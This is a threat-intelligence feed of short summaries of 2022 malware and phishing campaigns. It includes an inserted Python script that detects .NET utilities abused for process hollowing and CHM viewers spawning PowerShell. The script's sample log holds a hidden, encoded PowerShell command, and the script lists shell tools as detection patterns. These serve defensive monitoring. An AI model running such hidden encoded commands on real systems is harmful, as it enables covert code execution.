- The_AgentTesla_malware_increased_distribution
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- CERT-UA has tracked mass mailings of emails with the topic “Technisches Zeichnen” and attached to the e-mail is an IMG file containing a CHM file of the same name, opening which will execute JavaScript code.
—
- Intel Source:
- Cybereason
- Intel Name:
- Ragnar_Locker_Ransomware_Targeting_Energy_Sector
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from Cybereason have investigated the Ragnar Locker malware family, a ransomware and a ransomware operator which has recently claimed to have breached DESFA, a Greek pipeline company.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_MS_Word_Files_Targeting_North_Korea
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea.
—
- Intel Source:
- BitDefender
- Intel Name:
- Diving_Deep_into_Industrial_Espionage_Operation
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- BitDefender researchers have analyzed a corporate espionage operation in depth. A common misconception is that espionage affects only large corporations or government entities, but it is more common than expected.
Source:
https://businessinsights.bitdefender.com/deep-dive-into-a-corporate-espionage-operation
—
- Intel Source:
- ASEC
- Intel Name:
- RAT_Tool_Distributed_on_Github_as_Solution_File
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered a RAT Tool disguised as a solution file (*.sln) on GitHub. To avoid detection, the malware disguised itself as a solution file. Upon execution, it injects into normal Windows programs, such as AppLaunch.exe, RegAsm.exe, and InstallUtil.exe, to run a RAT.
—
- Intel Source:
- Cyble
- Intel Name:
- Magecart_JavaScript_Skimmer_Stealing_Payment_Information
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from Cyble Intelligence Labs have identified a JavaScript skimmer created by the Magecart threat group that has been stealing payment information from a Magento-based e-commerce website.
Source:
https://blog.cyble.com/2022/09/01/highly-evasive-magecart-javascript-skimmer-active-in-the-wild/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Hackers_Using_ModernLoader_RAT_to_Infect_Systems_with_Stealers_and_Cryptominers
- Date of Scan:
- 2022-09-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos have observed three distinct campaigns between March and June 2022 that delivered a number of threats, including the ModernLoader bot, the RedLine information stealer, and cryptocurrency mining malware.
Source:
https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_cash_payments_online_fraud
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- CERT-UA observed an increase in the number of scam pages in the Facebook social network. The content of these pages refers to the topic of monetary compensation, the eHelp platform, financial assistance from various organizations and partners.
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- A_new_wild_version_of_ChromeLoader
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Cybergeeks analyzed a new version of ChromeLoader (also known as Choziosi Loader) over the last couple of weeks. The campaign has become widespread and has spawned multiple versions, making atomic indicators ineffective for detection.
Source:
https://cybergeeks.tech/chromeloader-browser-hijacker/
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Leveraging_Fast_Reverse_Proxy_tool_to_Attack_Korean_Companies
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified attackers scanning and attacking externally accessible corporate systems such as IIS web servers and MS Exchange servers. After the initial compromise they use a web shell to access the system and abuse Potato-family tools or other privilege escalation exploits to obtain SYSTEM privileges.
—
- Intel Source:
- ASEC
- Intel Name:
- VBScript_downloads_a_malicious_HWP_file
- Date of Scan:
- 2022-09-01
- Impact:
- LOW
- Summary:
- Researchers from the ASEC team have discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware is yet to be determined, but the VBScript itself is downloaded through curl.
—
- Intel Source:
- Netlab 360
- Intel Name:
- The_activation_of_PureCrypter_Loader_continues
- Date of Scan:
- 2022-08-31
- Impact:
- MEDIUM
- Summary:
- Researchers from Netlab have identified that PureCrypter Loader continues to be active this year and has spread more than 10 other families, including Formbook, SnakeKeylogger, AgentTesla, Redline, AsyncRAT, and more.
Source:
https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/
—
- Intel Source:
- AT&T
- Intel Name:
- Crypto_miners_updated_with_latest_techniques
- Date of Scan:
- 2022-08-30
- Impact:
- LOW
- Summary:
- Researchers from AT&T Alien Labs have provided an overview of an ongoing crypto mining campaign that caught their attention due to the large number of loaders that showed up during the month of June, as well as how staged the execution is for a malware as simple as a miner.
Source:
https://cybersecurity.att.com/blogs/labs-research/crypto-miners-latest-techniques
—
- Intel Source:
- Netskope
- Intel Name:
- AsyncRAT_Leveraging_Fully_Undetected_Downloader
- Date of Scan:
- 2022-08-30
- Impact:
- LOW
- Summary:
- Researchers from Netskope have analyzed the complete infection flow of AsyncRAT, from the FUD BAT downloader spotted by MalwareHunterTeam to the final payload. Although no AV vendor detects the file, it is flagged by many Sigma and IDS rules, as well as by the sandboxes used by VirusTotal.
Source:
https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader
—
- Intel Source:
- Cyble
- Intel Name:
- Mini_Stealer_Builder_and_Panel_For_Free
- Date of Scan:
- 2022-08-30
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs have discovered a post on a cybercrime forum where a Threat Actor released MiniStealer’s builder and panel for free, and they claim that the stealer can target operating systems such as Windows 7, 10, and 11.
Source:
https://blog.cyble.com/2022/08/29/mini-stealer-possible-predecessor-of-parrot-stealer/
—
- Intel Source:
- Securonix
- Intel Name:
- New_Golang_Attack_Campaign_GO#WEBBFUSCATOR_Leverages_Office_Macros
- Date of Scan:
- 2022-08-30
- Impact:
- MEDIUM
- Summary:
- The Securonix Threat Labs Threat Research Team has recently analyzed a unique sample of a persistent Golang-based attack campaign, tracked by Securonix as GO#WEBBFUSCATOR, that infects the target system with malware.
—
- Intel Source:
- ProofPoint
- Intel Name:
- TA423_threat_group_targeting_countries_in_South_China_Sea
- Date of Scan:
- 2022-08-30
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint and Pwc threat intelligence team have identified a phishing campaign, running for over a year and currently ongoing, and targeting countries in the South China Sea, as well as further intrusions in Australia, Europe, and the United States.
Source:
https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea
—
- Intel Source:
- CheckMarx
- Intel Name:
- First_Known_Phishing_Attack_Against_PyPI_Users
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Researchers from CheckMarx have identified an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates into packages in the repository; it is the first known phishing attack against the Python Package Index (PyPI).
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_Crypto_Miner_Malware_Campaign_Named_Nitrokod
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have detected a cryptomining campaign, called Nitrokod, which potentially infected thousands of machines worldwide. It is created by a Turkish speaking entity and the campaign dropped malware from free software available on popular websites such as Softpedia and uptodown.
—
- Intel Source:
- SocInvestigations
- Intel Name:
- Remcos_RAT_updated_with_New_TTPs
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Researchers from SOCInvestigation have identified new TTPs of Remcos RAT. It is a dangerous trojan available to attackers for a relatively low price and it comes equipped with enough robust features to allow attackers to set up their own effective botnets.
Source:
https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_emerging_of_BlueSky_ransomware
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- SentinelOne researchers took a renewed look at BlueSky ransomware in late June 2022 and observed it being spread via trojanized downloads from questionable websites as well as through phishing emails.
—
- Intel Source:
- Cloudsek
- Intel Name:
- TeamTNT_Group_Targeting_Cloud_Instances_and_Containerized_Environments
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- CloudSEK researchers have identified the known threat actor TeamTNT has been targeting cloud instances and containerized environments on systems around the world for at least two years.
Source:
https://cloudsek.com/threatintelligence/timeline-ttps-of-teamtnt-cybercrime-group/
—
- Intel Source:
- Mitiga
- Intel Name:
- Spear-phishing_and_AiTM_Used_to_Hack_MS_Office_365_Accounts
- Date of Scan:
- 2022-08-29
- Impact:
- LOW
- Summary:
- Mitiga Research Team have identified a sophisticated, advanced business email compromise (BEC) campaign, directly targeting relevant executives of organizations using Office 365.
Source:
https://www.mitiga.io/blog/advanced-bec-scam-campaign-targeting-executives-on-o365
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_deployment_of_32-bits_or_64-bits_malware
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- The researcher ran an experiment by downloading samples from MalwareBazaar and produced a report with some interesting statistics based on YARA rules.
Source:
https://isc.sans.edu/diary/32+or+64+bits+Malware%3F/28968
—
- Intel Source:
- HC3
- Intel Name:
- A_Deep_Analysis_of_Karakurt_Ransomware
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from HC3 have analyzed Karakurt Threat Profile deeply and identified four attacks affecting the US Healthcare and Public Health Sector since June 2022. The observed attacks have affected an assisted living facility, a dental firm, a healthcare provider, and a hospital.
Source:
https://www.hhs.gov/sites/default/files/karakurt-threat-profile-analyst-note.pdf
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Agenda_Ransomware_Customized_for_Each_Victim
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a new ransomware that is written in the Go programming language and targeting healthcare and education enterprises in Asia and Africa. This ransomware is called Agenda and is customized per victim.
Source:
https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html
—
- Intel Source:
- Cyble
- Intel Name:
- A_Dot_Net_Based_Moisha_Ransomware
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from Cyble have come across a Twitter post about a new ransomware variant named Moisha. A .Net-based ransomware, Moisha was first identified in mid-August 2022, and the name of the TA is PT_MOISHA team.
Source:
https://blog.cyble.com/2022/08/25/moisha-ransomware-in-action/
—
- Intel Source:
- Microsoft
- Intel Name:
- Iran_Based_Threat_Actor_MERCURY_Leveraging_Exploitation_of_Log4j_2_Vulnerabilities
- Date of Scan:
- 2022-08-26
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence and 365 Defender Research team have detected Iran-based threat actor MERCURY leveraging exploitation of Log4j 2 vulnerabilities in SysAid applications against organizations all located in Israel.
—
- Intel Source:
- Labs K7 Security
- Intel Name:
- BleachGap_ransomware_reappeared
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from Labs K7 Security have analyzed the BleachGap ransomware and found that threat actors are modifying the attack techniques of this malware for a possible major attack that might be planned in the future.
Source:
https://labs.k7computing.com/index.php/bleachgap-revamped/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Actors_Leveraging_Genshin_Impact_Driver
- Date of Scan:
- 2022-08-25
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers investigated mhyprot2.sys, the anti-cheat driver for the popular role-playing game Genshin Impact, and found a vulnerability in it. The driver is currently being abused by a ransomware actor to kill antivirus processes and services before mass-deploying ransomware.
—
- Intel Source:
- Trellix
- Intel Name:
- Diving_Deep_into_Qbot_Malware
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from the Trellix SecOps team have observed an uptick in Qbot malware infections in recent months. It has been an active threat for over 14 years and continues to evolve, adopting new infection vectors to evade detection mechanisms.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html
—
- Intel Source:
- Group-IB
- Intel Name:
- A_0ktapus_Phishing_Campaign
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from Group-IB Threat Intelligence Team have detected 169 unique domains involved in the 0ktapus phishing campaign. While analyzing the phishing sites, they found an image that is legitimately used by sites leveraging Okta authentication, being used by the phishing kit.
—
- Intel Source:
- IronNet
- Intel Name:
- Multiple_Known_Malware_Findings_from_the_BlackHat_NOC
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- IronNet hunters uncovered several active malware infections on the Black Hat network, including Shlayer malware, the North Korean-attributed SHARPEXT malware, and NetSupport RAT.
Source:
https://www.ironnet.com/blog/a-view-from-the-black-hat-noc-key-findings
—
- Intel Source:
- Cofense
- Intel Name:
- Threat_Actors_Leveraging_Compromised_Microsoft_Dynamics_365_Voice_Account_for_Phishing_Attack
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from Cofense have identified a widespread campaign where threat actors use a compromised Dynamics 365 Customer Voice business account and a link posing as a survey to steal Microsoft 365 credentials.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_Deep_examination_of_Wiper_Malware
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from the CrowdStrike Research Team have described how threat actors use legitimate third-party drivers to bypass the visibility and detection capabilities of security mechanisms and solutions.
Source:
https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-2/
—
- Intel Source:
- Avast
- Intel Name:
- AgentTesla_is_Back_With_a_New_Campaign
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Threat researchers from Avast have identified a new malicious campaign and it is threatening businesses around the world. The campaign is targeting users in Spain, Portugal, Romania, and multiple countries in South America.
—
- Intel Source:
- Securelist
- Intel Name:
- Kimsukys_hackers_using_C2_operations_with_GoldDragon_malware
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from Securelist have identified that the Kimsuky threat group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis. It is one of the most prolific and active threat actors on the Korean Peninsula, operates several clusters, and GoldDragon malware is one of its most frequently used tools.
Source:
https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/
—
- Intel Source:
- Zscaler
- Intel Name:
- Pirated_Software_Download_Sites_Delivering_InfoStealer_Malware
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- Researchers from Zscaler Threat Labs have discovered multiple ongoing threat campaigns distributing info-stealer malware by targeting victims trying to download pirated software applications.
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT_and_XMRig_CoinMiner_Leveraging_Windows_License_Verification_Tool
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool.
—
- Intel Source:
- CISA
- Intel Name:
- The_active_exploitation_of_multiple_vulnerabilities_and_Exposures_against_Zimbra_Collaboration_Suite
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- CISA and MS-ISAC researchers have identified cyber threat actors targeting unpatched Zimbra Collaboration Suite instances in both government and private sector networks.
—
- Intel Source:
- ASEC
- Intel Name:
- AsyncRAT_Being_Distributed_in_Fileless_Form
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered AsyncRAT being distributed in fileless form. It is executed through multiple script files without being written to disk and is thought to be distributed as a compressed file attachment in emails.
—
- Intel Source:
- Wordfence
- Intel Name:
- Trends_in_Ukrainian_Domain_attacks
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Wordfence have identified 16 attack types that triggered more than 85 different firewall rules across protected websites with Ukrainian top-level domains.
Source:
https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/
—
- Intel Source:
- Uptycs
- Intel Name:
- A_malicious_use_of_Tox_protocol_for_coinminers
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have examined malware samples that do not do anything explicitly malicious, but they feel that it might be part of a coinminer campaign. Additionally, they are observing it for the first time where Tox protocol is used to run scripts onto the machine.
Source:
https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers
—
- Intel Source:
- Cyble
- Intel Name:
- IBAN_clipper_malware_targeting_Windows_operating_systems
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Cyble Labs have highlighted an International Bank Account Number (IBAN) Clipper Malware after identifying a Threat Actor on a cybercrime forum offering monthly subscription-based services of clipper malware targeting Windows operating systems.
Source:
https://blog.cyble.com/2022/08/22/dissecting-iban-clipper/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Detailed_Analysis_of_PivNoxy_and_Chinoxy_malware
- Date of Scan:
- 2022-08-23
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have identified an attack against the telecommunication agency in South Asia that began with a simple email that initially appeared to be a standard malicious spam email message. However, the attached Word document was weaponized using a malicious tool, Royal Road, and is equipped with an exploit for an Equation Editor vulnerability (CVE-2018-0798).
Source:
https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis
—
- Intel Source:
- Google blog
- Intel Name:
- Iranian_hackers_Leveraging_New_Tool_to_Steal_Email_From_Victims
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Google Threat Analysis Group have observed New Iranian APT data extraction tool called HYPERSCRAPE. It is written in .NET for Windows PCs and is designed to run on the attacker’s machine.
Source:
https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/
—
- Intel Source:
- SentinelOne
- Intel Name:
- XCSSET_Malware_updated_with_latest_version
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have reviewed the changes made to the latest versions of XCSSET malware and reveal some of the contexts in which these threat actors operate.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Astaroth_Guildma_malware_pushed_by_malspam
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed an Astaroth (Guildma) malware infection generated from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA. Boleto is a payment method used in Brazil, while Grupo Solução & CIA is a Brazil-based company.
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Malspam_used_by_attackers_to_deliver_AgentTesla_RAT
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Malwarebytes Threat Intelligence researchers have identified spam emails containing images and CHM files. When the CHM file is opened, it invokes PowerShell commands that ultimately execute AgentTesla through RegAsm.exe.
Source:
https://twitter.com/MBThreatIntel/status/1561736526819639298
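Both this entry and the ASEC entry above (the RAT disguised as a .sln file that injects into AppLaunch.exe, RegAsm.exe, and InstallUtil.exe) describe the same pattern: a signed .NET Framework utility started with no assembly to process, or a help/document viewer spawning PowerShell. The following is an added detection example, not code from Malwarebytes or ASEC. The log line format, the field names, the parent allow-list, and the sample events are constructed for this example; a real Sysmon or EDR export would need its own parser and the allow-list should be tuned to the environment.

```python
"""Flag process-creation events that match LOLBin abuse: .NET Framework
utilities (RegAsm.exe, InstallUtil.exe, AppLaunch.exe) started as injection
hosts, and the CHM viewer hh.exe spawning PowerShell.
Constructed example; not from the ASEC or Malwarebytes reports."""
from dataclasses import dataclass
from typing import List, Tuple

# .NET Framework utilities named in the reports as injection/hollowing hosts
INJECTION_HOSTS = {"regasm.exe", "installutil.exe", "applaunch.exe"}
# Parents under which those utilities run legitimately (assumption: tune per estate)
EXPECTED_PARENTS = {"devenv.exe", "msbuild.exe", "msiexec.exe", "services.exe", "explorer.exe"}
# Document/help viewers that should not be launching shells or .NET utilities
DOCUMENT_HOSTS = {"hh.exe", "winword.exe", "excel.exe", "outlook.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class Event:
    pid: int
    image: str         # full path of the created process
    cmdline: str       # raw command line as logged (quotes preserved)
    parent_image: str  # full path of the parent process


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting both \\ and / separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> Event:
    """Parse one 'Key=Value|Key=Value' event line (constructed log format)."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return Event(int(fields["ProcessId"]), fields["Image"],
                 fields["CommandLine"], fields["ParentImage"])


def has_arguments(cmdline: str) -> bool:
    """True when anything follows the executable token. RegAsm/InstallUtil do
    nothing useful without an assembly argument, so a bare launch is the
    tell-tale of a process being started only to be hollowed."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        parts = s.split(None, 1)
        rest = parts[1] if len(parts) > 1 else ""
    return rest.strip() != ""


def evaluate(ev: Event) -> List[str]:
    """Return the names of the detection rules the event matches."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    hits: List[str] = []
    if img in INJECTION_HOSTS:
        if parent not in EXPECTED_PARENTS:
            hits.append("dotnet_host_unusual_parent")
        if not has_arguments(ev.cmdline):
            hits.append("dotnet_host_without_assembly")
    if parent in DOCUMENT_HOSTS and (img in SHELLS or img in INJECTION_HOSTS):
        hits.append("document_viewer_spawns_shell")
    return hits


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run every rule over every line; returns (pid, rule) pairs in log order."""
    findings: List[Tuple[int, str]] = []
    for line in lines:
        ev = parse_line(line)
        findings.extend((ev.pid, rule) for rule in evaluate(ev))
    return findings


# Constructed sample events (not real telemetry). The -enc blob is "IEX" in UTF-16LE base64.
NET = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    # RegAsm.exe launched bare by PowerShell: hollowing host, unexpected parent
    f"ProcessId=4120|Image={NET}RegAsm.exe|CommandLine=\"{NET}RegAsm.exe\"|ParentImage={PS}",
    # CHM viewer spawning an encoded PowerShell command
    f"ProcessId=4121|Image={PS}|CommandLine=powershell.exe -w hidden -enc SQBFAFgA|ParentImage=C:\\Windows\\hh.exe",
    # Legitimate: InstallUtil run from Visual Studio with an assembly argument
    f"ProcessId=4122|Image={NET}InstallUtil.exe|CommandLine=InstallUtil.exe /i C:\\build\\MyService.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Visual Studio\\devenv.exe",
    # AppLaunch.exe started bare by a '.sln' that is really an executable
    f"ProcessId=4123|Image={NET}AppLaunch.exe|CommandLine=AppLaunch.exe|ParentImage=C:\\Users\\dev\\Downloads\\Project.sln.exe",
]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_LOG):
        print(f"pid {pid}: {rule}")
```

The bare-launch check is the one that survives renaming of the dropper: a process-hollowing host has to be started suspended with an innocuous command line before the RAT is written into it, so RegAsm.exe or InstallUtil.exe with no assembly argument is worth alerting on regardless of parent. The parent allow-list is where false positives live and is an assumption to be adjusted from a baseline of the estate's own build and installer activity.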
—
- Intel Source:
- MalwareBytes
- Intel Name:
- FIN7_rewrite_JSSLoader_malware_with_expanded_capabilities
- Date of Scan:
- 2022-08-22
- Impact:
- MEDIUM
- Summary:
- Researchers at Malwarebytes have identified a malspam campaign in late June that they attribute to the FIN7 APT group. FIN7 has rewritten its JSSLoader malware with expanded capabilities as well as new functions that include data exfiltration.
Source:
https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni
—
- Intel Source:
- Sucuri
- Intel Name:
- SocGholish_JavaScript_Malware_Back_into_Action
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have analysed the SocGholish JavaScript Malware and they are outlining the injections and URLs used in the website malware portion of the SocGholish attack outside of the NDSW/NDSX campaign.
Source:
https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html
—
- Intel Source:
- Cyble
- Intel Name:
- New_BianLian_Ransomware_Targeting_Multiple_Industries
- Date of Scan:
- 2022-08-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble have observed that malware written in the programming language “Go” has recently been popular among Threat Actors. Also, during their daily threat hunting exercise, they came across a Twitter post about a ransomware variant written in Go named BianLian.
Source:
https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/
—
- Intel Source:
- Zscaler
- Intel Name:
- Grandoreiro_Banking_Malware_Targeting_Spanish_and_Mexican_Organizations
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler ThreatLabs have observed a Grandoreiro banking malware campaign. In this campaign, the threat actors impersonate government officials from the Attorney General’s Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute ‘Grandoreiro,’ a prolific banking trojan.
—
- Intel Source:
- Cyble
- Intel Name:
- XWorm_RAT_with_Ransomware_and_HNVC_attack_capabilities
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble Labs have discovered a dark web post in which a malware developer advertises a powerful Windows RAT; the post redirects to the developer's website, where multiple malicious tools are being sold.
Source:
https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/
—
- Intel Source:
- Sucuri
- Intel Name:
- A_malicious_JavaScript_injection_affecting_WordPress_websites
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- Sucuri researchers have observed and analyzed a recent spike in JavaScript injections targeting WordPress sites that result in fake DDoS-protection prompts, which lead victims to download remote access trojan malware.
Source:
https://blog.sucuri.net/2022/08/fake-ddos-pages-on-wordpress-lead-to-drive-by-downloads.html
—
- Intel Source:
- Group-IB
- Intel Name:
- ATMZOW_JS_Sniffer_Campaign_Connected_to_Hancitor_Malware
- Date of Scan:
- 2022-08-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Group-IB have identified that the ATMZOW JS sniffer campaign and the Hancitor malware downloader were both operated by the same threat actor. They collected information about ATMZOW's recent activity and found ties to a phishing campaign targeting clients of a US bank, based on the same JS obfuscation technique.
—
- Intel Source:
- Group-IB
- Intel Name:
- APT41_targeted_13_entities_in_US,_Taiwan,_India,_Vietnam_and_China
- Date of Scan:
- 2022-08-21
- Impact:
- MEDIUM
- Summary:
- Group-IB has been monitoring APT41 activity since 2021 and has produced a report documenting the group's targeting of 13 organizations geographically spanning the U.S., Taiwan, India, Vietnam, and China.
—
- Intel Source:
- ProofPoint
- Intel Name:
- TA558_Targets_Hospitality_and_Travel_firms
- Date of Scan:
- 2022-08-20
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofpoint have been monitoring the activities of threat actor TA558 since 2018; in 2022 the actor is still targeting hospitality, travel, and related industries based in Latin America, North America, and Western Europe. Moreover, TA558 has recently shifted tactics to URLs and container files to distribute malware.
—
- Intel Source:
- Cybereason
- Intel Name:
- Attackers_Leveraging_Bumblebee_Loader
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- The Cybereason GSOC team has analyzed a case involving a Bumblebee Loader infection in which the operators conducted intensive reconnaissance and redirected the output of executed commands to files for exfiltration.
—
- Intel Source:
- SocInvestigations
- Intel Name:
- Reemergence_of_Raccoon_Infostealer_Malware_with_New_TTPS
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- SocInvestigation researchers have documented new TTPs of the Raccoon Infostealer. It is available as malware-as-a-service on underground forums and is a robust stealer that harvests data such as passwords, cookies, and autofill data from browsers.
—
- Intel Source:
- Securelist
- Intel Name:
- Malicious_PyPi_packages_turn_Discord_into_info_stealing_malware
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky have analyzed two PyPI packages that contain info-stealing malware and also modify the Discord client. The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs such as email addresses, passwords, and billing information.
Source:
https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/
—
- Intel Source:
- VirusTotal
- Intel Name:
- Detailed_Analysis_of_Follina_Vulnerability
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- VirusTotal’s threat hunting team analyzed the Follina vulnerability in depth and provided a high-level overview of all observed attacks, focusing on those that took place before the 0-day was publicly disclosed, along with practical recommendations on how to monitor for and hunt Follina samples.
Source:
https://blog.virustotal.com/2022/08/hunting-follina.html
—
- Intel Source:
- Secureworks
- Intel Name:
- Diving_Deep_into_DarkTortilla_Malware
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Researchers from the Secureworks Counter Threat Unit have found that the long-running DarkTortilla crypter is still evolving. It usually delivers information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine, though some samples have been seen delivering targeted payloads such as Cobalt Strike and Metasploit.
Source:
https://www.secureworks.com/research/darktortilla-malware-analysis
—
- Intel Source:
- ESET
- Intel Name:
- Lazarus_Group_Targeting_Job_Seekers_with-macOS_Malware
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Slovak cybersecurity firm ESET has identified the North Korea-backed Lazarus Group targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.
Source:
https://twitter.com/ESETresearch/status/1559553342057205761
—
- Intel Source:
- Securonix
- Intel Name:
- Newly_Active_Malicious_Scanner_IPs
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Internal scan, No git required
Source:
Internal Source
—
- Intel Source:
- Esentire
- Intel Name:
- A_new_variant_of_NJRAT
- Date of Scan:
- 2022-08-18
- Impact:
- LOW
- Summary:
- The eSentire Cyber Threat Hunting team has discovered a new variant of NJRAT which is capable of logging keystrokes, viewing the victim’s camera, and remotely controlling the system.
Source:
https://www.esentire.com/blog/njrat-comes-disguised-as-video-streaming-software
—
- Intel Source:
- Mandiant
- Intel Name:
- Iranian_Threat_Actor_UNC3890_targets_Israeli_entities
- Date of Scan:
